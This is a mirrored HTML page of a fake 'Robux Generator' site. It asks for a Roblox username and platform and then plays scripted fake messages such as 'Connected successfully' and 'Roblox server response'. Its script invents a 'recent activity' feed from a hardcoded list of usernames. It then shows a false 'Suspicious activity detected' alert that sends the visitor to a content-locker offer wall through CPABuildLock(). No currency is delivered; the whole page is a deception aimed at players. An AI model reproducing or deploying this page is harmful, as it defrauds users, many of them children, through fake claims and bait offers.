<!DOCTYPE html>
 
<html>
 <head>
    <title>Robux Generator</title>
<meta name="description" content=""/>
<meta property="og:title" content="Robux Generator"/>
<meta property="og:description" content=""/>
<meta name="referrer" content="no-referrer">
<meta name="robots" content="noindex,nofollow">
<!-- Analytics -->

<script
        src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js"
        integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF"
        crossorigin="anonymous"
></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    ga('create', 'UA-52489995-1', 'auto');
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(http://fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        </style>

<!-- Fonts -->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">
<link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400;500;600;700;800;900&amp;family=Open+Sans:wght@400;600;700;800&amp;family=Oswald:wght@300;400;500;600;700&amp;family=Roboto:wght@400;500;700;900&amp;display=swap" rel="stylesheet">
<!-- CSS -->
<link href="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/1560948479d91c6cb94810a0e18124bcdad21ce8e7.css" rel="stylesheet" />
<link href="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/1563298961d7e11a0c316ea6a189a4b4e2bd1ad627.css" rel="stylesheet" />
<style>
h1,h2,h3 {
font-family:"Oswald",sans-serif;
font-weight:300;
text-transform:uppercase;
color:#ffe93c;
line-height:1.3
}

.col-3{
	padding-right: 5px;
    padding-left: 5px;
}

.row {
    margin-right: -5px;
    margin-left: -5px;
}

img.ina {
    filter: invert(1) !important;
}

h1 {
font-size:30px
}

h2 {
font-size:26px
}

p {
color:#ffffff;
font-family:"Roboto",sans-serif;
font-weight:300;
font-size:24px;
margin-top:10px
}

section {
background-color:black
}

ul {
padding:0;
list-style:none;
margin:0
}

.title-container {
width:80%;
max-width:1080px;
margin:0 auto;
padding:50px 0;
text-align:center
}

.video {
max-width:100%
}

input[name="username"] {
color:#fff
}

#home {
position:relative
}

#home:before {
content:'';
position:absolute;
top:0;
left:0;
width:100%;
height:100%;
background:rgba(0,0,0,.4);
z-index:2
}

.form-content {
position:absolute;
z-index:3;
width:100%
}

.visible-mobile {
display:none
}

.form-control {
background:rgba(0,0,0,.7);
border:1px solid #756d6d;
color:#fff !important;
padding:15px;
height:auto;
font-size:15px;
font-family:'montserrat',Arial,Helvetica,sans-serif;
border-radius:10px;
font-family:"Open Sans",Verdana,Arial,Helvetica,sans-serif
}

.form-control:focus,.form-control:active {
background:rgba(0,0,0,.7);
box-shadow:none
}

.proceed-button {
padding:10px;
background-color:#ffe93c;
border:none;
color:#000;
font-size:14px;
text-transform:uppercase;
cursor:pointer;
border-radius:10px;
font-family:"Open Sans",Verdana,Arial,Helvetica,sans-serif;
letter-spacing:1px;
border:1px solid #ffe93c;
-webkit-transition:all .3s ease;
-moz-transition:all .3s ease;
-ms-transition:all .3s ease;
-o-transition:all .3s ease;
transition:all .3s ease;
line-height:25px;
width:300px;
max-width:100%
}

.proceed-button.active,.proceed-button:hover {
color:#ffe93c;
background-color:#000
}

.proceed-button i {
font-size:18px
}

.video-wrapp {
display:inline-block;
padding:0;
margin:0;
width:100%;
padding-top:56.25%;
height:0;
position:relative
}

.video-wrapp iframe {
position:absolute;
top:0;
left:0;
right:0;
bottom:0
}

.video-lesson {
background-repeat:no-repeat;
background-position:center center;
background-size:cover;
width:100%;
height:inherit;
background-image:url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/16621909845aa92e698f0ec91b119c5a29c65f2f9f.jpg)
}

.generate-window:before {
content:"";
background-image:url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/16621909673b7ded2475dcccdee6103c47107bb144.png);
position:fixed;
top:0;
left:0;
height:100%;
width:100%;
background-size:2%
}

.generate-window {
position:fixed;
top:0;
left:0;
height:100%;
width:100%;
display:none;
z-index:99;
background-image:linear-gradient(to bottom,#344152,#181e2a)
}

#video:before {
content:"";
width:100%;
background-image:linear-gradient(to right,#000000 5%,#fee000,#000000 95%);
display:block;
margin-top:0;
height:2px
}

.steps {
margin:0 80px;
display:flex
}

.steps .step {
width:150px;
background:rgba(255,255,255,.3);
padding:10px 7px;
display:flex;
align-items:center;
justify-content:center;
border:1px solid #868f9e;
margin-right:5px;
text-align:center;
color:#fff;
text-transform:uppercase;
font-size:13px;
border-radius:10px;
}

.steps .step.active {
background:rgba(239,227,107,.7)
}

.steps .step img {
width:24px;
margin-right:5px
}

.cards-wrapp {
background:rgba(0,0,0,.3);
border:1px solid #616c80;
padding:5px;
margin:0 80px;
width:100%
}

.cards-wrapp .single-card {
background:radial-gradient(#34404c,#1f2535);
border:2px solid #616c80;
position:relative;
cursor:pointer;
border-radius:10px;
}

.cards-wrapp .single-card .img-wrapp {
display:flex;
justify-content:center;
align-items:center;
height:150px
}

.cards-wrapp .single-card .img-wrapp img {
max-width:100px;
max-height:100px
}

.single-card > span {
display:flex;
align-items:center;
padding-top:7px;
padding-left:7px;
color:#fff;
font-size:20px
}

.single-card span img {
width:35px;
margin-right:5px
}

.single-card .free-text {
font-size:20px;
background-image:linear-gradient(180deg,#f2b818,#fffd7f);
text-align:center;
padding:5px;
font-weight:900;
border-radius:0 0 10px 10px;
}

.information .single-card .img-wrapp img {
max-height:70px
}

.information .single-card .img-wrapp {
font-size:24px;
color:#fff;
height:auto
}

.loading-wrapp {
background:radial-gradient(#34404c,#1f2535);
position:fixed;
left:0;
top:0;
width:100%;
height:100%
}

.loader-wrapp {
font-size:36px
}

.loading-text {
text-transform:uppercase;
font-size:13px;
letter-spacing:2px;
font-weight:500
}

.single-act {
background-repeat:no-repeat;
background-position:center center;
background-size:cover;
padding:10px;
background:#c5b326;
border:2px solid #f1d608;
color:#fff;
border-radius:10px;
}

.single-act .coins-summ img {
margin-right:7px
}

.single-act .coins-summ span {
font-weight:700;
font-size:20px
}

.modal {
background:radial-gradient(#34404c,#1f2535)
}

.modal-content {
background:radial-gradient(#34404c,#1f2535)
}

.modal-content p {
font-size:12px
}

#footer {
position:relative;
background-color:#000;
color:#adabad;
font-family:"Open Sans",Verdana,Arial,Helvetica,sans-serif;
font-style:normal
}

#footer .studio-links li {
vertical-align:middle;
font-size:14px;
line-height:initial;
width:200px
}

#footer .footer-left {
width:40%
}

#footer .studio-links ul {
display:-webkit-box;
display:-moz-box;
display:-ms-flexbox;
display:-webkit-flex;
display:flex;
-webkit-box-orient:horizontal;
-moz-box-orient:horizontal;
-webkit-flex-direction:row;
-ms-flex-direction:row;
flex-direction:row;
-webkit-box-align:center;
-webkit-align-items:center;
-ms-flex-align:center;
align-items:center
}

#footer .studio-links li {
vertical-align:middle;
font-size:14px;
line-height:initial;
width:200px
}

#footer .studio-links li a {
display:block
}

#footer .studio-links li img {
width:100%
}

#footer .footer-right {
width:60%
}

#footer .legal-line {
margin:20px
}

#footer .legal-line p {
font-size:14px;
line-height:15px
}

#footer .legal-links {
text-transform:uppercase;
letter-spacing:2px;
text-align:center;
margin-top:10px
}

#footer .legal-links > ul {
display:-moz-box;
display:-ms-flexbox;
display:-webkit-flex;
-ms-flex-pack:distribute;
display:-webkit-box;
display:flex;
justify-content:space-around
}

#footer .legal-links li a {
text-decoration:none;
color:#ffe93c;
font-size:14px
}

#footer .legal-links li a:hover {
color:#fff
}

@media only screen and (max-width:580px) {
.visible-desktop {
display:none
}

.visible-mobile {
display:block
}

#footer .legal-line {
margin:20px 0
}

.footer-left,.footer-right {
width:100%!important
}

#footer .legal-links li a {
font-size:11px
}

.cards-wrapp {
margin:0
}

.cards-wrapp .single-card .img-wrapp img {
max-width:70px;
max-height:70px
}

.cards-wrapp .single-card .img-wrapp {
height:120px
}

.steps .step {
width:48%;
margin-bottom:5px
}

.steps {
margin:0;
width:100%;
flex-wrap:wrap
}

    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<section id="home" class="d-flex justify-content-center align-items-center">
<video class="video visible-desktop" poster="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662362709a5528c64aac4191238cbb9fee9efb344.jpg" autoplay="" loop="" muted="">
<source type="video/mp4" src="#">
</video>
<video class="video visible-mobile" poster="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16621909813a3699fe8c26280043c48158b7065203.jpg" playsinline="" loop="" muted="">
<source type="video/mp4" src="#">
</video>
<div class="form-content mt-5 pt-5 mt-lg-0 pt-lg-0">
<div class="container" style="z-index:3">
<div class="row">
<div class="col-12 col-md-3">
</div>
<div class="col-12 col-md-6">
<div class="text-center animated fadeInDown">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662386476e079c28afb384c853251566740f92ca3.png" class="ina logo w-100">
</div>
<div class="form-wrapp animated fadeInUp">
<div class="row">
<div class="col-12">
<div class="form-group input-name-wrapp">
<input type="text" class="form-control" name="username" placeholder="Username" spellcheck="false">
</div>
</div>
<div class="col-12">
<div class="form-group platforms-wrapp">
<div class="row">
<div class="col-3">
<button class="btn proceed-button btn-platform w-100" data-id="1">
<i class="fab fa-apple"></i>
</button>
</div>
<div class="col-3">
<button class="btn proceed-button btn-platform w-100" data-id="2">
<i class="fab fa-android"></i> 
</button>
</div>
<div class="col-3">
<button class="btn proceed-button btn-platform w-100" data-id="3">
<i class="fab fa-windows"></i>
</button>
</div>
<div class="col-3">
<button class="btn proceed-button btn-platform w-100" data-id="4">
<i class="fab fa-xbox"></i>
</button>
</div>
</div>
</div>
</div>
</div>
<center>
<button type="button" name="proceed" class="btn proceed-button button-generate"><span>PROCEED</span></button>
</center>
</div>
</div>
</div>
</div>
</div>
</section>
<section id="recent-activity" class="py-4">
<div class="title-container text-center">
<h1>Recent Activity</h1>
<p>Users current generatings</p>
<div class="container">
<div class="row">
<div class="col-12 col-lg-4 offset-0 offset-lg-4">
<div class="activity-row"></div>
</div>
</div>
</div>
</div>
</section>
<div class="generate-window align-items-center justify-content-center">
<div class="container d-flex flex-column align-items-center">
<div class="steps animated fadeInDown">
<div class="step step-1 active" data-id="1"><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16621909660ba1052c2089266597348c727b7961ef.png"> <span></span></div>
<div class="step step-2 active" data-id="2"><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662440077c55f8a7487fdf961f87c2ca638e7513b.png"> <span></span></div>
<div class="step step-3" data-id="3"><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662190968ad19940e2ee884a85b1dfc632b739d01.png"> <span></span></div>
</div>
<div class="mt-3 w-100 d-flex justify-content-center">
<div class="cards-wrapp">
<div class="row points">
<div class="col-6 col-lg-3 mb-3 mb-lg-0">
<div class="single-card animated flipInY" data-id="1">
<span><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662440077c55f8a7487fdf961f87c2ca638e7513b.png"> 800</span>
<div class="img-wrapp py-3">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16624400782178f3278142ea2a133c67fbd902c657.png">
</div>
<div class="free-text">ROBUX</div>
</div>
</div>
<div class="col-6 col-lg-3 mb-3 mb-lg-0">
<div class="single-card animated flipInY" data-id="2">
<span><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662440077c55f8a7487fdf961f87c2ca638e7513b.png"> 1700</span>
<div class="img-wrapp py-3">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16624400782178f3278142ea2a133c67fbd902c657.png">
</div>
<div class="free-text">ROBUX</div>
</div>
</div>
<div class="col-6 col-lg-3">
<div class="single-card animated flipInY" data-id="3">
<span><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662440077c55f8a7487fdf961f87c2ca638e7513b.png"> 4500</span>
<div class="img-wrapp py-3">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16624400782178f3278142ea2a133c67fbd902c657.png">
</div>
<div class="free-text">ROBUX</div>
</div>
</div>
<div class="col-6 col-lg-3">
<div class="single-card animated flipInY" data-id="4">
<span><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662440077c55f8a7487fdf961f87c2ca638e7513b.png"> 10000</span>
<div class="img-wrapp py-3">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16624400782178f3278142ea2a133c67fbd902c657.png">
</div>
<div class="free-text">ROBUX</div>
</div>
</div>
</div>

<div class="row information" style="display:none">
<div class="col-12">
<div class="single-card animated flipInY">
<div class="row">
<div class="col-12">
<div class="img-wrapp points-text py-3 d-flex flex-column">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16621909834ddc3385c43d2374095912324887a242.png">
<span>0</span>
</div>
</div>

</div>
<div class="row mt-3">
<div class="col-6">
<div class="img-wrapp platform-text py-3 d-flex flex-column">
</div>
</div>
<div class="col-6">
<div class="img-wrapp username py-3 d-flex flex-column align-items-center h-100 justify-content-center">
</div>
</div>
</div>
<button type="button" name="generate" class="btn proceed-button w-100"><span>Generate</span></button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="loading-wrapp justify-content-center align-items-between flex-column" style="display:none;z-index:9999">
<div class="container">
<div class="row information">
<div class="col-12 col-lg-6 offset-0 offset-lg-3">
<center>
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662386476e079c28afb384c853251566740f92ca3.png" class="ina logo w-75">
</center>
<div class="loading mt-5 text-white">
<div class="loader-wrapp text-center">
<i class="fas fa-cog fa-w-16 fa-spin fa-lg"></i>
</div>
<div class="loading-text text-center mt-2 mb-4">Connecting...</div>
</div>
</div>
</div>
</div>
</div>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":3645590,"key":"d97d4"};
</script>
<script src="https://d2bb5k76l7oivo.cloudfront.net/93ab3af.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    var shareFunction=0,timed=15e3;function rand(t,e){return e?Math.floor(Math.random()*(e-t+1))+t:Math.floor(Math.random()*(t+1))}function modalWindow(t,e){$(t).click(function(){return $(e).modal("show"),!1})}$.fn.extend({animateCss:function(t,e){var a=function(t){var e,a={animation:"animationend",OAnimation:"oAnimationEnd",MozAnimation:"mozAnimationEnd",WebkitAnimation:"webkitAnimationEnd"};for(e in a)if(void 0!==t.style[e])return a[e]}(document.createElement("div"));return this.addClass("animated "+t).one(a,function(){$(this).removeClass("animated "+t),"function"==typeof e&&e()}),this}});var platform,username,sc,cdts,activityPlatform=['<i class="fab fa-apple"></i> iOS','<i class="fab fa-android"></i> Android','<i class="fab fa-windows"></i> Windows','<i class="fab fa-xbox"></i> Xbox'],cp=[800,1700,4500,1e4],credits=[25e3,5e4,75e3,1e5],users=["TurtletheCat","JukeKing","xPecake","BlGHUEVOS","Plun","KingCobra","TDKSmoothie","TSMLustboy","C10Meteos","lllllllllllllIII","ohdaughter","PekinWoof","BrandonFtw8","m2sticc","DaiJurJur","DontMashMe","CaseOpened","otte","wutroletoplay","Thurtle","Dodo8","Frostalicious","bobqinXD","MrCarter","Hellkey","IREGlNALD"];$(".btn-platform").click(function(){$(".btn-platform").removeClass("active"),$(this).addClass("active"),platform=$(this).attr("data-id")}),$(".button-generate").click(function(){username=$('input[name="username"]').val(),$(".steps .step-1 span, .username").text(username),platform||$(".platforms-wrapp").animateCss("bounce"),username||$(".input-name-wrapp").animateCss("bounce"),platform&&username&&($(".platform-text").html(activityPlatform[platform-1]),$(".generate-window").css("display","flex"))}),$(".points .single-card").click(function(){var t=$(this).attr("data-id");$(".steps .step-2 span").text(cp[t-1]),$(".steps .step-3").addClass("active"),$(".points").css("display","none"),$(".cards-wrapp").css("width","270px"),$(".information").css("display","flex"),$(".points-text").html('<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16624400782178f3278142ea2a133c67fbd902c657.png"><span>'+cp[t-1]+"</span>")}),$('button[name="generate"]').click(function(){$(".loading-wrapp").css("display","flex"),setTimeout(function(){$(".loading-text").html("<span>Connected successfully...</span>"),setTimeout(function(){$(".loading-text").html("<span>"+username+" user verification!</span>"),setTimeout(function(){$("loading-text").html("<span>"+username+" verified successfully!</span>"),setTimeout(function(){$(".loading-text").html("Roblox server response..."),setTimeout(function(){$(".loading-text").html("Connected successfully..."),setTimeout(function(){shareFunction?($(".loading-text").html('<div class="text-center">'+shareText+'</div><div class="d-flex justify-content-center align-items-baseline social-wrapper"></div>'),$(".social-wrapper a").click(function(){$(".loading-text").html('<h4 class="text-center text-white">Checking shares status...</div>'),setTimeout(function(){$(".loading-text").html('<div class="alert alert-danger py-4"><span class="text-danger">Suspicious activity detected, you have to verify your account!</span></div><button class="btn proceed-button mt-4 wow fadeInUp loader-button" onclick="CPABuildLock()" data-wow-delay="0.1s">Verify</button>')},timed)})):$(".loading-text").html('<div class="alert alert-danger py-4"><span class="text-danger">Suspicious activity detected, you have to verify your account!</span></div><button class="btn proceed-button mt-4 wow fadeInUp loader-button" onclick="CPABuildLock()" data-wow-delay="0.1s">Verify</button>')},3e3)},2500)},3e3)},2500)},3500)},1500)});var html,timeOutNum=0,generateTemplate=function(){var t=rand(0,users.length),e=rand(0,3),a=rand(0,cp.length-1);timeOutNum=rand(2e3,5e3);var n=$(".single-act");2<=n.length?$(n[n.length-1]).remove():timeOutNum=0,html='\t\t\t\t\t<div class="single-act row mb-3 animated bounceIn">\t\t\t\t\t\t\t<div class="col-12">\t\t\t\t\t\t\t\t<div class="single-act-details">\t\t\t\t\t\t\t\t\t<h4 class="m-0 activity-username">'+users[t]+"</h4>\t\t\t\t\t\t\t\t\t"+activityPlatform[e]+'\t\t\t\t\t\t\t\t\t<div class="d-flex justify-content-center">\t\t\t\t\t\t\t\t\t\t<div class="align-items-center coins-summ cp d-flex">\t\t\t\t\t\t\t\t\t\t\t<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1662440077c55f8a7487fdf961f87c2ca638e7513b.png" width="30"> <span>'+cp[a]+"</span>\t\t\t\t\t\t\t\t\t\t</div>\t\t\t\t\t\t\t\t\t</div>\t\t\t\t\t\t\t\t</div>\t\t\t\t\t\t\t</div>\t\t\t\t\t\t</div>",$(".activity-row").prepend(html),clearInterval(interval),interval=setInterval(generateTemplate,timeOutNum)},interval=setInterval(generateTemplate,timeOutNum);

</script>
<script type="text/javascript" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/1563194332a1feff07bb466fd26feaa3594da71117.js"></script>
<script>
</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('https://64246229d2289.slyrack.online/customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>

<!-- Mirrored from 64246229d2289.slyrack.online/affee3c by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 29 Mar 2023 16:08:45 GMT -->
</html>
